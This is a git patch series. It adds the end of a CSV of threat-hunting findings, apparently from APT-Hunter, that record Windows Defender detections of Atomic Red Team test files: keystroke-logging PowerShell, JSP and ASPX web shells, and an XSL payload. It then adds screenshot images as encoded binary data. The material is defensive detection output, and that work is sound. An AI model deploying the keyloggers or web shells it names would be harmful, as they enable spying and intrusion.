file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 102 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} + 2019-07-18T20:40:16.697Z + + + 2147708292 + HackTool:JS/Jsprat + 4 + High + 34 + Tool + https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Suspicious Command or process found in the log,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 101 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 103 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 2 + %%809 + + 0x80508023 + The program could not find the malware and other potentially unwanted software on this device. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 101 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 103 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 2 + %%809 + + 0x80508023 + The program could not find the malware and other potentially unwanted software on this device. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482515.198914,2019-07-19T00:41:55.198914+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 95 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9} + 2019-07-18T20:41:40.357Z + + + 2147726426 + Trojan:Win32/Sehyioa.A!cl + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482477.632054,2019-07-19T00:41:17.632054+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 76 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED} + 2019-07-18T20:40:18.385Z + + + 2147683177 + Backdoor:ASP/Ace.T + 5 + Severe + 6 + Backdoor + https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482477.508276,2019-07-19T00:41:17.508276+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 75 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} + 2019-07-18T20:40:16.697Z + + + 2147708292 + HackTool:JS/Jsprat + 4 + High + 34 + Tool + https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482475.439635,2019-07-19T00:41:15.439635+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 48 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {8791B1FB-0FE7-412E-B084-524CB5A221F3} + 2019-07-18T20:40:13.775Z + + + 2147735426 + Trojan:XML/Exeselrun.gen!A + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl + 1 + %%845 + 1 + %%813 + 2 + %%823 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Suspicious Command or process found in the log,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 37 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 37 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational -- 2.34.1 From c967070926bad56d1b83187d714f17837c130e41 Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:44:31 +0800 Subject: [PATCH 09/13] ADD file via upload --- source/screenshot/APTHunter-Allreport.png | Bin 0 -> 10343 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 source/screenshot/APTHunter-Allreport.png diff --git a/source/screenshot/APTHunter-Allreport.png b/source/screenshot/APTHunter-Allreport.png new file mode 100644 index 0000000000000000000000000000000000000000..225ecf5631a1b18969f639b7ae9de17b9c748ca6 GIT binary patch literal 10343 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
  • @W4W^UBvXm&%K;4IJ}2ZdjTqbIW1nyjvP`*ywb<3|{_hJd4Qq;MKC4%7cGK?Yri0RmIQbx&o~z56=WR3To2*Qf092ma09d2UO; z-_dXJ?O-wBRe}_QC8Ty4$=m%Pa+zYt6h97ET!E}d;KsH)QM`AV=@$Dv(1>GpV4n1uMXU_+a+Zx!nJA$+6F0@i!|7Z6)? z?54Q^a3f6$zzKS;rcS;c-e#Nw{XU~%9;J=$j-5+geC*}*<1MY;TNvc)eE~WjmLwOA z)>o`fTs5);>)lyS$zSEoNVFU1YU7vmWKu7AMOGzwYF!;n79(=LGrBny~9gr!Q?%N_IDxQ2hZBL-zfCg=zw6~5#nVNOns(wY>me{}rz?ed7~ zdfCoi2O-t^xk~nn4Dh-tn^s&N5*bOyXa@)bC}(bN!pW<=&?NAI4$4C#r;Sd54R!qg z;$xt31B`>S>Pbj+T}JDNQVu&MRrhv$5%lPxL*XaTep&ra4+(vW0&g||fY@tg3oMb} z5wBKnjI3YpH(fFF-LD-h6m)s|fbHmM^{UIEv!P+AecGX1>EQ^7STFS+8g>oa5n#(N zrgWeI4L-HXyOHGcj|S8O4Nia!0oDI#kVCxSJ~rz_*agQucwLgiOQ8HxIU|0+Z%KLa zUeDp!zxdHy3j zoAAgw@gLz(edjfye}%tZ|8L&R>HnMP(4qfZy8p6{FaKu@2kY?vpD`@#9~t%fQHn9T ScmJP#GBL2YUwija{Qm<~2<2=5 literal 0 HcmV?d00001 -- 2.34.1 From bbf070f892586759478e0bfdb0de9d58fd88a6d5 Mon Sep 17 00:00:00 2001 From: pex7hfbnt <1584881064@qq.com> Date: Wed, 16 Oct 2024 23:44:53 +0800 Subject: [PATCH 10/13] ADD file via upload --- source/screenshot/APTHunter-Excel.png | Bin 0 -> 242189 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 source/screenshot/APTHunter-Excel.png diff --git a/source/screenshot/APTHunter-Excel.png b/source/screenshot/APTHunter-Excel.png new file mode 100644 index 0000000000000000000000000000000000000000..4db713f45601aa2cd91898dafbe4b88f7b6b01f5 GIT binary patch literal 242189 zcmc$_byQqmvo;7Jfh1UfAdLohZCsOJ!GpWI1a~L62X{z9aCg_nr6D-MX(U)9jY~6x z{NDF|ckZ2;JO6xNt;J%U(`W78T~)i}spo`$l$S(*N%#^00Rdg=gP0Nm0+KHR!qbT7 z$PafAqg#_6{ylYiFQxMQLA;-vggsmXoW(VqmF>)&-3%Q~5zKAvKAAE*89SPq+B#X- zIUgc*2qPf8L68!Ar{bQuzvSjEcLC`?o^84?i;%@OYN#hrt&!Lll2&Y?Q|#bo&apu5w^6MteqDDFleMwzRf7=(l?F~M@^A%aX z0LEZpV;f9X+fTJIH7W3JnzjpNIXC4}>NJ$oZDbEnlfV44UT`W&d5& zGV^oJKc5$@(o&qLG=tl7guj~hdYecehLnV|zT-Pl{;maVKFt}`>xbCtV~;3D745_r z63m^Pn}{;`Cnz&Y!q)r|(Fk~BT(-GzKZtGkX`}VeM&+5qq=QUg{llZU3itc3%YMdn zP1f7bTs1DBC}^*kdM%>A!iu{wb#ye7WZ=meQtTgL1DF>(xG0sM@_7m5oDqhjM@Kj6}Xv&94D*#u!HMzO-q#ftt2{g$p}Y5hUr z+oW!kInwF7^b{wx4#aDnSSU2ewx$b{HKwZ4BKq-;TviR(xRMoM;5Onz;N_K$-H9G&4{?z#!vfwgOPE*Oy?)b2I
  • Za6vBvZe=$VCMNuzc)D!-%F?tQGrYw%J9C1*=3Ol zZxhZ|BocR*Uv9oSUsZh$MTO-?rNN9(!dS5acmitIZitQ^W$_QftKU43D=0t1uv_QIFX6(P#HjJC!*CJzy8qv}R`o9S!e)^f9wo3;h*l zP!a&}`h1pvGFd05JG6yPRcIizoYkITeJnm2iApeTE=)^|9B?L4d2p&JpCdFB0qwQl zbw%@8!$ePzdYQEG+@`Xpa7z%%)Gl;FC()&afLm=Sy z*@&+56BM;-Zd>sr=OXyjgOg#|6ASfJUE21jeSQ8+2dX#I%A14egXcJ5Xf(Q zb%h9ZPfAiym8eu>M%j9mme1NMM6rseBzFE3B)+oDBhJ#u&H9V$>|C z05iL)GQ_TP<{thoYvh{)x)sH!H2G>ftaV9vp{W0ThR`-?2Y7(kSP+VN|M5X9^f)&+tV|+%Pj%=Pk9~gO zkNT_ktp}Z1%8(MR3ih7lHOQ54qQ$pRN3H3GHY_s*H1r1Vf5V0Ba*|{UJEVI>Uuix8 z;+SxCR%IOPYGKVlMB7tq6G3p*ovFqn<9Q45hYYb%v>|bBwM1|SbCu5&>B?cu=V;XQ z6+~krkxT{pFthtZ7UwUEQslvK+`)|GKAMZh%q>2OM!B zfTD|YV<4PzBih10OMPxMnf&YC0`*v+5o@gjtRfi36ACDhd?jwHchqBzo`(hPPq|Y} zZmT_FSM=Mg$BQrJx$R! z0nmxvp>uy+H`O%@DCNW_rSg8xb_Sf&{d>*FJEl|twUL*6FQ3<1aScrfEs)f~-xci27D{P! z$@@xVs`qKksT?^5w5RDe5U_SF$efPv{#jp_oPy$Fl<@srOZ4+$tEjS(SEJT% zd;5=&ufKeG1>2&fpy+;$6-S%t({lBW9Y3M*1>^md#%*yrCA_{LKZfff+V3Y?J%Gl5 zu-@6MZ*?TUqhOk|v!^Vd?>rIs&8mN`VuXQI;=OMDZQDpRdpK+M$aN;|sGU_~n!n{J zET&1=fyC_!dR@(8re?kFRh62iuWcnk%Lxs;l8bhBnC)U)VvJ_PcfE#XMy)Q3 z7P*ryoSQ~nle1&SF3TosUCuM2Uy*+VltGTZ3=b3hRO(?N;z$8nv3*yE{cHg1cXY-m 